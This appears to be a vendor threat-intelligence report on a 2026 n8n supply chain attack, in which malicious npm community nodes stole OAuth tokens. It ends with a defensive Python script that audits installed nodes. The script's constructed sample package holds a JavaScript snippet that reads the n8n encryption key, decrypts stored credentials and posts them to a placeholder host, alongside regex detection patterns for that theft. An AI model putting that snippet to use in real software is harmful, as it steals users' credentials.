Executive Summary
In early January 2026, threat actors targeted the n8n workflow automation ecosystem by publishing eight malicious npm packages that mimicked legitimate integrations. Installed as community nodes, the packages prompted unsuspecting users to connect OAuth-protected services such as Google Ads, Stripe, and Salesforce. n8n encrypts stored credentials with a single instance key (N8N_ENCRYPTION_KEY, held in the environment or in the instance's config file); because community nodes run inside the n8n process, the malicious code could read that key, decrypt the OAuth tokens in the credential store, and send them to attacker-controlled servers. The campaign exploited developer trust in community packages and highlighted a dangerous avenue for credential theft at scale.
This incident reflects the increasing sophistication and frequency of supply chain attacks, particularly against workflow automation tools that centralize sensitive credentials. With open-source ecosystems growing rapidly, businesses face heightened urgency to scrutinize third-party integrations and adopt least-privilege, zero trust security practices.
Why This Matters Now
The ongoing risks associated with open community integrations and the lack of adequate sandboxing in automation platforms significantly expand organizational attack surfaces. As attackers increasingly exploit software supply chains and credential vaults, the speed at which malicious code can be propagated and sensitive data exfiltrated has never been higher, demanding urgent supply chain governance.
Attack Path Analysis
The attackers published npm packages that masqueraded as legitimate n8n community nodes, and victims installed them through n8n's own community-node mechanism. This step required no exploit or privilege escalation: a community node is an ordinary npm package loaded into the n8n process, so it runs with the same filesystem, database and environment access as n8n itself, including the credential store and the key that encrypts it. That access let the malicious code decrypt stored OAuth tokens and reach every workflow and connected service the instance was authorized for. The only infrastructure the attackers needed was an external server: the node exfiltrated the decrypted credentials over ordinary outbound connections during workflow execution, and the same channel served as its command and control. The impact was theft of credentials, potential secondary access to the integrated services those tokens unlock, and compromise of the business processes built on them.
Kill Chain Progression
Initial Compromise
Description
Malicious npm packages posing as trusted n8n community nodes were published and installed by developers, introducing attacker-controlled code into victim workflows.
Related CVEs
CVE-2026-21877
CVSS: 10.0
An authenticated user may be able to execute untrusted code, potentially leading to full compromise of the affected n8n instance.
Affected Products:
n8n n8n – < 1.0.0
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)
Command and Scripting Interpreter (T1059)
Credentials from Password Stores (T1555)
Unsecured Credentials: Credentials In Files (T1552.001)
Adversary-in-the-Middle (T1557)
Exfiltration Over C2 Channel (T1041)
Impair Defenses: Disable or Modify Tools (T1562.001)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – User Identification and Authentication Controls
Control ID: 8.2.1
NYDFS 23 NYCRR 500 – Cybersecurity Program
Control ID: 500.02
DORA (EU Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Article 6
CISA ZTMM 2.0 – Protect all Credentials (including secrets, tokens, and API keys)
Control ID: Identity Pillar - Credential Protection
NIS2 Directive – Supply Chain Security
Control ID: Article 21(2)d
ISO/IEC 27001:2022 – Addressing Information Security within Supplier Agreements
Control ID: A.5.20
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Supply chain attacks targeting workflow automation platforms expose OAuth tokens and API keys, compromising development environments and integrated services authentication mechanisms.
Information Technology/IT
Malicious npm packages exploiting n8n community nodes create credential vault breaches, enabling lateral movement across cloud services and automation infrastructure deployments.
Marketing/Advertising/Sales
Google Ads OAuth credential theft through fake n8n integrations compromises advertising campaign data and customer insights stored in workflow automation platforms.
Financial Services
Credential harvesting from automation platforms threatens Stripe payment processing tokens and financial API keys, enabling unauthorized transaction access and data exfiltration.
Sources
- n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens (The Hacker News): https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html
- Risks when using community nodes (n8n documentation): https://docs.n8n.io/integrations/community-nodes/risks/
- Malicious npm packages target the n8n automation platform in a supply chain attack (CSO Online): https://www.csoonline.com/article/4115417/malicious-npm-packages-target-n8n-automation-platform-in-a-supply-chain-attack.html
Cloud Native Security Fabric (CNSF) Mitigations and Controls
CNSF-aligned controls such as zero trust segmentation, east-west traffic inspection, and tight egress policy enforcement would have restricted the malicious node's ability to move laterally, access sensitive credentials, and exfiltrate stolen tokens. Real-time threat detection and workload segmentation could have exposed and mitigated unauthorized outbound actions or anomalous credential access within developer environments.
Control: Zero Trust Segmentation
Mitigation: Prevented installation and execution of unauthorized third-party code in sensitive workflow environments.
Control: East-West Traffic Security
Mitigation: Detected and contained unauthorized access to credential stores or sensitive inter-workload communication.
Control: Kubernetes Security (AKF)
Mitigation: Prevented unauthorized pod-to-pod or namespace lateral movement within workflow hosting clusters.
Control: Egress Security & Policy Enforcement
Mitigation: Terminated or alerted on unauthorized outbound connection attempts to unapproved destinations.
Control: Cloud Firewall (ACF)
Mitigation: Detected and blocked anomalous data exfiltration from workflow instances.
Control: Real-Time Threat Detection
Mitigation: Rapidly detected anomalous credential access and workflow behavior, reducing dwell time and damage.
Impact at a Glance
Affected Business Functions
- Workflow Automation
- Data Integration
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of OAuth tokens and API keys for integrated services like Google Ads, Stripe, and Salesforce, leading to unauthorized access and data breaches.
Recommended Actions
Key Takeaways & Next Steps
- Vet community nodes before installation (publisher, source repository, download history, what the code reads and where it connects), and disable community package installation on instances that do not need it (N8N_COMMUNITY_PACKAGES_ENABLED=false).
- If a malicious node was installed, treat every credential stored in that instance as exposed: revoke the affected OAuth grants and API keys at the provider and re-issue them.
- Enforce zero trust segmentation to ensure third-party packages and community nodes operate with the minimum privileges and access boundaries in workflow automation platforms.
- Implement strict egress security controls (FQDN/IP filtering) at the network and application layer to block unauthorized outbound access from automation and CI/CD services.
- Deploy real-time threat detection and anomalous behavior monitoring to identify suspicious credential access and workflow execution patterns.
- Apply Kubernetes and pod-level segmentation to prevent malicious workloads from laterally accessing unrelated application namespaces and service identities.
- Enforce continuous visibility and centralized policy control across multi-cloud and hybrid deployments to promptly detect and contain supply chain threats.
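The audit below is an added example, not code from n8n, from the researchers who reported the campaign, or from this page's sources. It turns the Attack Path Analysis above into detection logic and implements the "threat detection" action in a static form: it walks an n8n community-node directory and flags packages that combine the three things the campaign relied on, namely access to the instance encryption key, credential decryption, and outbound connections to hosts outside an operator-supplied allowlist. Assumptions: packages are unpacked under `<nodes_dir>/node_modules/` (n8n's default custom nodes directory is `~/.n8n/nodes`); the indicator regexes and the two sample packages are constructed for this example and are not published indicators of compromise; the hostnames are RFC 2606 placeholders.

```python
"""Static audit of installed n8n community nodes for the pattern described above:
code that reads the instance encryption key, decrypts stored credentials, and
sends them to an unapproved host. Added example; assumptions are noted inline."""
import json
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Official nodes ship as n8n-nodes-base and under the @n8n scope; community packages
# are required to use an "n8n-nodes-<name>" prefix. Borrowing the official prefix is
# a typosquat signal (a heuristic chosen for this example, not an n8n rule).
LOOKALIKE = re.compile(r"^(n8n-nodes-base[-_.]|@n8n[-/_]|n8n-core\b)", re.I)

# Heuristic source indicators (assumption: chosen for this example, not published IoCs).
INDICATORS = {
    "reads_encryption_key": re.compile(r"N8N_ENCRYPTION_KEY|encryptionKey|\.n8n[\\/]config"),
    "touches_credential_store": re.compile(r"credentials_entity|credentialsHelper|getDecrypted", re.I),
    "decrypts_aes": re.compile(r"createDecipheriv|AES\.decrypt|\bCipher\b"),
}
URL = re.compile(r"https?://[^\s'\"`<>)]+")
SOURCE_SUFFIXES = {".js", ".ts", ".mjs", ".cjs"}


def scan_source(text: str, allowed_hosts: set[str]) -> dict:
    """Indicators that fire in one source file, plus hosts it references outside the allowlist."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hosts = {urlparse(m).hostname for m in URL.findall(text)}
    hits["unapproved_hosts"] = sorted(h for h in hosts if h and h not in allowed_hosts)
    return hits


def audit_package(pkg_dir: Path, allowed_hosts: set[str]) -> dict:
    """Audit one unpacked package; the verdict is 'high' only for the full exfiltration chain."""
    name = json.loads((pkg_dir / "package.json").read_text()).get("name", pkg_dir.name)
    evidence = {k: False for k in INDICATORS}
    unapproved: set[str] = set()
    for src in pkg_dir.rglob("*"):
        # Skip non-source files and the package's own vendored dependencies.
        if src.suffix not in SOURCE_SUFFIXES or "node_modules" in src.relative_to(pkg_dir).parts:
            continue
        hits = scan_source(src.read_text(errors="ignore"), allowed_hosts)
        for k in INDICATORS:
            evidence[k] |= hits[k]
        unapproved.update(hits["unapproved_hosts"])
    # Key access + a way to use it + an unapproved egress host is the chain the campaign used;
    # a single indicator on its own (e.g. a node that legitimately calls AES) is only a review item.
    chain = evidence["reads_encryption_key"] and (
        evidence["decrypts_aes"] or evidence["touches_credential_store"]) and bool(unapproved)
    verdict = "high" if chain else ("review" if any(evidence.values()) or unapproved else "clean")
    return {"name": name, "lookalike_name": bool(LOOKALIKE.match(name)), "indicators": evidence,
            "unapproved_hosts": sorted(unapproved), "verdict": verdict}


def audit_nodes_dir(nodes_dir: Path, allowed_hosts: set[str]) -> dict[str, dict]:
    """Audit every package under <nodes_dir>/node_modules, scoped (@org/name) packages included."""
    modules = nodes_dir / "node_modules"
    manifests = list(modules.glob("*/package.json")) + list(modules.glob("@*/*/package.json"))
    results = [audit_package(m.parent, allowed_hosts) for m in manifests]
    return {r["name"]: r for r in results}


def build_sample_tree(root: Path) -> Path:
    """Constructed sample tree (not real packages): one benign node and one that mirrors the attack."""
    mods = root / "nodes" / "node_modules"
    benign = mods / "n8n-nodes-acme-crm"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({"name": "n8n-nodes-acme-crm"}))
    (benign / "AcmeCrm.node.js").write_text(
        "const BASE = 'https://api.acme.example/v1';\n"
        "module.exports.execute = async function () { return this.helpers.httpRequest({ url: BASE }); };\n")
    rogue = mods / "n8n-nodes-base-google-ads-oauth"  # official-looking prefix on a community package
    rogue.mkdir(parents=True)
    (rogue / "package.json").write_text(json.dumps({"name": "n8n-nodes-base-google-ads-oauth"}))
    (rogue / "GoogleAdsOauth.node.js").write_text(
        "const fs = require('fs'); const CryptoJS = require('crypto-js');\n"
        "const cfg = JSON.parse(fs.readFileSync(process.env.HOME + '/.n8n/config'));\n"
        "const key = process.env.N8N_ENCRYPTION_KEY || cfg.encryptionKey;\n"
        "const plain = CryptoJS.AES.decrypt(blob, key).toString(CryptoJS.enc.Utf8);\n"
        "fetch('https://collector.example.net/upload', { method: 'POST', body: plain });\n")
    return root / "nodes"


def run_demo() -> dict[str, dict]:
    """Build the sample tree in a temp dir and audit it with a one-host allowlist."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_nodes_dir(build_sample_tree(Path(tmp)), allowed_hosts={"api.acme.example"})


if __name__ == "__main__":
    for name, r in run_demo().items():
        print(f"{r['verdict']:6} {name}  lookalike={r['lookalike_name']}  hosts={r['unapproved_hosts']}")
```

Point `audit_nodes_dir` at a real instance's nodes directory and pass the hosts its approved integrations talk to. The verdict deliberately demands the whole chain before reporting "high": many legitimate nodes make outbound calls, and a few legitimately use AES, so any single indicator is surfaced as "review" rather than blocked outright. A static scan like this complements, and does not replace, the egress filtering and runtime monitoring listed above, since a package can fetch its payload at runtime or obfuscate the strings the regexes look for.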